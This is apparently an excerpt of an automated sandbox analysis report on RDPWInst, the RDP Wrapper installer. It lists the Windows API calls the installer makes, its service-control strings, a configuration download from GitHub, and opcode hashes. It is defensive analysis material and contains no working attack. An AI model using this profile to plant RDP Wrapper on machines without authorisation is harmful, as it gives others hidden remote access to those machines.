                                                                                                                                  • Opcode Fuzzy Hash: 93014c2a0d15a9f7c19c06a67ffa09c9f03b47d74489f26678219aaa478409b4
                                                                                                                                  • Instruction Fuzzy Hash: 40B092927543401AEA0035FA0CC6F2A418CD70960AF110C3ABA42E7183D47FC8290026
                                                                                                                                  APIs
                                                                                                                                  • lstrcpynW.KERNEL32(?,00000000,?,00000000,004093AD,?,?,?,00000000), ref: 0040937A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcpyn
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 97706510-0
                                                                                                                                  • Opcode ID: f92199f7e57e2128dd250d54d35a9e3758d953fbac64912c85fa78ba761ebe9f
                                                                                                                                  • Instruction ID: 1f383253a52e48d77bc15eb4822a33d834d352bf49a326ca98ed7cc47a11fc89
                                                                                                                                  • Opcode Fuzzy Hash: f92199f7e57e2128dd250d54d35a9e3758d953fbac64912c85fa78ba761ebe9f
                                                                                                                                  • Instruction Fuzzy Hash: 0111C671504204EFDF21DB69CC86B9A77F8EB19754F5100BAFC40AB2D2D7B8AD008A19
                                                                                                                                  APIs
                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00402AE3
                                                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00402B06
                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00402B13
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Virtual$Free$Query
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 778034434-0
                                                                                                                                  • Opcode ID: d2902ee949b2c85551e00087902fb7701d80a0372c0c987194a01e681a746040
                                                                                                                                  • Instruction ID: e8ddcf902efd7f78c833b1da2340b8221ccc6e4d64c13544335dcfda98f803ee
                                                                                                                                  • Opcode Fuzzy Hash: d2902ee949b2c85551e00087902fb7701d80a0372c0c987194a01e681a746040
                                                                                                                                  • Instruction Fuzzy Hash: 0CF06D343046005FD311CB19CA89B17BBE5EFC9350F15C17AE988973E5E675DC019B9A
                                                                                                                                  APIs
                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5EA
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5F9
                                                                                                                                    • Part of subcall function 0043B48C: CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4BC
                                                                                                                                    • Part of subcall function 0043B48C: CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4D1
                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B61F
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000010,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B62E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Service$CloseErrorHandleLastOpen$Manager
                                                                                                                                  • String ID: $sD$...$OpenSCManager$OpenService$ServicesActive$StartService$[*] Starting
                                                                                                                                  • API String ID: 2257214823-3855835416
                                                                                                                                  • Opcode ID: 55f0df0e7310880f6e7cb70b762c89182bbbe75636a3247ae01688996091d268
                                                                                                                                  • Instruction ID: 0e693e6e1cec2ac2fe46a8ff9d209bc722a6061919d6bcedfcc5fc96e321ed9b
                                                                                                                                  • Opcode Fuzzy Hash: 55f0df0e7310880f6e7cb70b762c89182bbbe75636a3247ae01688996091d268
                                                                                                                                  • Instruction Fuzzy Hash: 6C313471A04208AEDB10FBB68842B5F77E8DB4C715F60947BF614E7283DB7C9940869E
                                                                                                                                  APIs
                                                                                                                                  • InternetOpenW.WININET(RDP Wrapper Update,00000000,00000000,00000000,00000000), ref: 0043CF9B
                                                                                                                                  • InternetOpenUrlW.WININET(00000000,https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini,00000000,00000000,80000000,00000000), ref: 0043CFB7
                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0043CFC3
                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0043CFDB
                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0043D002
                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0043D008
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Internet$CloseHandle$Open$FileRead
                                                                                                                                  • String ID: $sD$RDP Wrapper Update$https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini
                                                                                                                                  • API String ID: 4294395943-3115740878
                                                                                                                                  • Opcode ID: 0dd60196e7cab0bfb1fb3172ef56b337b41d75a0cde3163acb5471a059a842a1
                                                                                                                                  • Instruction ID: c5d90ac50beae541ecf0d1101a3828864360ef58c633fc88e2a86ac238cf1af1
                                                                                                                                  • Opcode Fuzzy Hash: 0dd60196e7cab0bfb1fb3172ef56b337b41d75a0cde3163acb5471a059a842a1
                                                                                                                                  • Instruction Fuzzy Hash: B611EC30A40204BAE725DB629C52F5E73B99B5CB08F21907AF500B61C1DAFC6D15965E
                                                                                                                                  APIs
                                                                                                                                  • lstrcpynW.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408E8B
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408E9E
                                                                                                                                  • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408EB4
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408EC0
                                                                                                                                  • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?), ref: 00408EFC
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?), ref: 00408F08
                                                                                                                                  • lstrcpynW.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 00408F2B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcpyn$Findlstrlen$CloseFileFirst
                                                                                                                                  • String ID: \
                                                                                                                                  • API String ID: 426534248-2967466578
                                                                                                                                  • Opcode ID: c2c22b4f6afaac3322ec1ba7b89a81b7c1940998765c8b0d5641ec05d20bdfa1
                                                                                                                                  • Instruction ID: b362d454dc0c99aa6135db0f351dbab6b5904c2f5f97e8c1ae29e40b3cae7ae2
                                                                                                                                  • Opcode Fuzzy Hash: c2c22b4f6afaac3322ec1ba7b89a81b7c1940998765c8b0d5641ec05d20bdfa1
                                                                                                                                  • Instruction Fuzzy Hash: 2921DA72A005195BCB10EAA4CD89BEF736DEB84314F0845BBA554E32C1EA7CEA458B58
                                                                                                                                  APIs
                                                                                                                                  • IsValidLocale.KERNEL32(?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089B4
                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089D0
                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$Info$Valid
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1826331170-0
                                                                                                                                  • Opcode ID: 22c6a01b53f4869b0805d6a69e827c795f3fdd97ab41ae37c19bcf7436934d77
                                                                                                                                  • Instruction ID: a5145651339b4fb3455c536bf826b1f6d015bb6bedb64d7d22cca76e959b3329
                                                                                                                                  • Opcode Fuzzy Hash: 22c6a01b53f4869b0805d6a69e827c795f3fdd97ab41ae37c19bcf7436934d77
                                                                                                                                  • Instruction Fuzzy Hash: 4031C274A00618ABDF20EB55DD81BAF77B5EB44700F1040BBA588B72D1DA7D5E40CF5A
                                                                                                                                  APIs
                                                                                                                                  • GetVersionExW.KERNEL32(?,00443136,00000000,0044315A), ref: 004146A6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Version
                                                                                                                                  • String ID: 8[D
                                                                                                                                  • API String ID: 1889659487-4257705004
                                                                                                                                  • Opcode ID: 4c73b04ee2d3421a5135ac7becaf35c551135d218803d44854ea7cc165e5ef2a
                                                                                                                                  • Instruction ID: 2f0940f951a798b0a8c1b92e6229d48fd5c0b6d32f60b1d075f360ba34157daa
                                                                                                                                  • Opcode Fuzzy Hash: 4c73b04ee2d3421a5135ac7becaf35c551135d218803d44854ea7cc165e5ef2a
                                                                                                                                  • Instruction Fuzzy Hash: 7DF030B8605B419FDB00DF18E845659B7E0EB89314F00483AF485D7391D738A844CB6E
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,?,0040F7B7,00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000), ref: 0040F757
                                                                                                                                  • FindClose.KERNEL32(00000000,00000000,?,00000000,?,0040F7B7,00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000), ref: 0040F762
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                  • Opcode ID: 8349d8abcabe035f766b9fd57bf523843a29f3c72d549b36151af9bdffc9284f
                                                                                                                                  • Instruction ID: 44d6f2536772e544dca19d4554f13a915e571bc99722c0a0b507a91726501656
                                                                                                                                  • Opcode Fuzzy Hash: 8349d8abcabe035f766b9fd57bf523843a29f3c72d549b36151af9bdffc9284f
                                                                                                                                  • Instruction Fuzzy Hash: B9E0CD6261470815C72065B90CC9B5B728C5B04328F040BB77D5CF35D2FA3D8554115F
                                                                                                                                  APIs
                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 0040FB09
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DiskFreeSpace
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1705453755-0
                                                                                                                                  • Opcode ID: 061f37ac546520710da28799b67137028b65efc101c0d4d81ccfdcd92c7e26f4
                                                                                                                                  • Instruction ID: 58712635a06311b99fbeb36610203dfa2cb34c225fc8d295b9fe620e031658d4
                                                                                                                                  • Opcode Fuzzy Hash: 061f37ac546520710da28799b67137028b65efc101c0d4d81ccfdcd92c7e26f4
                                                                                                                                  • Instruction Fuzzy Hash: DC1112B5E00209AFDB04CF99C881DAFF7F9EFC8304B14C569A508E7254E6319A018B90
                                                                                                                                  APIs
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoLocale
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                  • Opcode ID: 7e0a8c61708f8e5fe9311120f60f8f5fdb241708797c452f410103c20568c8cd
                                                                                                                                  • Instruction ID: 9da8dff9c55e20549594a614ff7d844013acaeb15ab394cddf5a90cc700bc9e0
                                                                                                                                  • Opcode Fuzzy Hash: 7e0a8c61708f8e5fe9311120f60f8f5fdb241708797c452f410103c20568c8cd
                                                                                                                                  • Instruction Fuzzy Hash: 69E0927170021817E314A5695C86DEB725C9B58300F00417FBA06D7387EDB89D6046ED
                                                                                                                                  APIs
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoLocale
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                  • Opcode ID: ab3a7bc9c987a33d67a9bd60b42fd60c334eb7a711f5428dc5487131ec69b403
                                                                                                                                  • Instruction ID: 70141b24f99fd98ac1db3019ee377dee0462c825b9fd2fb3f3473e8324f2be5c
                                                                                                                                  • Opcode Fuzzy Hash: ab3a7bc9c987a33d67a9bd60b42fd60c334eb7a711f5428dc5487131ec69b403
                                                                                                                                  • Instruction Fuzzy Hash: 01E0DF3270031827F31495689D86EFB729C9B58300F00427BBE06D3382FDB49DA046E9
                                                                                                                                  APIs
                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0041524C,00000000,00415476,?,?,00000000,00000000), ref: 00412CAB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoLocale
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                  • Opcode ID: c8c474e4d6c9df360d6374c6a6ae5d3dec4118d646be2418b28a4789b35754d1
                                                                                                                                  • Instruction ID: c0299d43d85d1b47cbbe3802d462e1d0899c6c80b318dcec9f9e75b03fa43e2d
                                                                                                                                  • Opcode Fuzzy Hash: c8c474e4d6c9df360d6374c6a6ae5d3dec4118d646be2418b28a4789b35754d1
                                                                                                                                  • Instruction Fuzzy Hash: 17D05EB63092202AE210525B6E45DBF56DCCBC87A2F10443BBA48C6242E268CC5693F9
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LocalTime
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 481472006-0
                                                                                                                                  • Opcode ID: e8d3b386f6a7d5cca3471eaf155d8864694d2401fe0684cb90b003475a380097
                                                                                                                                  • Instruction ID: 9e8cd4c1e66a35051b5eb1694121f13696e39ccab0ec977751e8beb904ec194d
                                                                                                                                  • Opcode Fuzzy Hash: e8d3b386f6a7d5cca3471eaf155d8864694d2401fe0684cb90b003475a380097
                                                                                                                                  • Instruction Fuzzy Hash: D1A0110080882002C2803B2A0C032383080A800A30FC80BAAB8F8A02E2EA2E023088AB
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 00417D39
                                                                                                                                    • Part of subcall function 00417D04: GetProcAddress.KERNEL32(00000000), ref: 00417D1D
